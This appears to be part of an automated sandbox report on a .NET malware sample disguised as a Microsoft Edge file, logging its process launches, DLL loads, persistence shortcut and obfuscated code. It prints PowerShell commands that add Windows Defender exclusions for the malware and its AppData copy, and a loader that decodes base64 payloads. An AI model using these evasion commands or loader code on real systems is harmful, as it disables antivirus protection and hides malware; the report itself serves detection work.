              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge_visual_render.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msedge.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\msedge.exe "C:\Users\user\AppData\Roaming\msedge.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\msedge.exe "C:\Users\user\AppData\Roaming\msedge.exe"
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe'Jump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge_visual_render.exe'Jump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msedge.exe'Jump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'Jump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\msedge_visual_render.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
              Source: msedge.lnk.0.drLNK file: ..\..\..\..\..\msedge.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: msedge_visual_render.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: msedge_visual_render.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: msedge_visual_render.exe, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT._4KoARYDOQ9VLM9kYHmUXl0TIJBVcAWwhHQdPzVFF1TirE6JwTOjUgxh,bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT.XwxR3w92hYWm3OtktjYAuUUzmFlAiK5p8XJH8o6Jkmx1Y7nQbUBOXEn,bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT.AvVErL5jnNbxMgQcKtQFsqwhSA73cplEUkr4Blkx5g6tLn7fLySkDYO,bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT.IpSuxM8rkOLKDWfFCbXiilUMMAq9XhLI84dFOAZdBteOceY3PqmXAEu,_2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.Q5p04PRAB7LBBAAaZF0O16kjvtWGEN0Dw2pSJhBMl2N3H8t27ao4xHjSwF8wWyGjYu5BjToEY()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: msedge_visual_render.exe, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{S4ku4qClcCh2gh5Z8HTpbNWpRNq6v1srJBGTHgeJWNc1isDDrHke96faparjohKizoBNseHTw1Zl83cEllRjMGL5[2],_2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.eRcJhU85fgETQetokKo0O7H8LsfE25GNLLREJszbxkDRDwyfsy1Bwoqp5kMGguoIGTTFDPQTv(Convert.FromBase64String(S4ku4qClcCh2gh5Z8HTpbNWpRNq6v1srJBGTHgeJWNc1isDDrHke96faparjohKizoBNseHTw1Zl83cEllRjMGL5[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
